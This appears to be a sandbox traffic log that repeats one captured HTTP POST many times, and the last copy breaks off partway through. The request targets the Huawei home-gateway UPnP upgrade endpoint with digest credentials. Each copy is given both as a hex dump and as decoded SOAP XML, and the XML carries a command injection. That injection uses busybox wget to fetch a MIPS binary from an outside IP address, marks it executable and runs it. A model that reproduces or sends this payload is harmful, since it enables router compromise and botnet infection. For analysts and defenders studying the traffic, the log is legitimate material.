              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 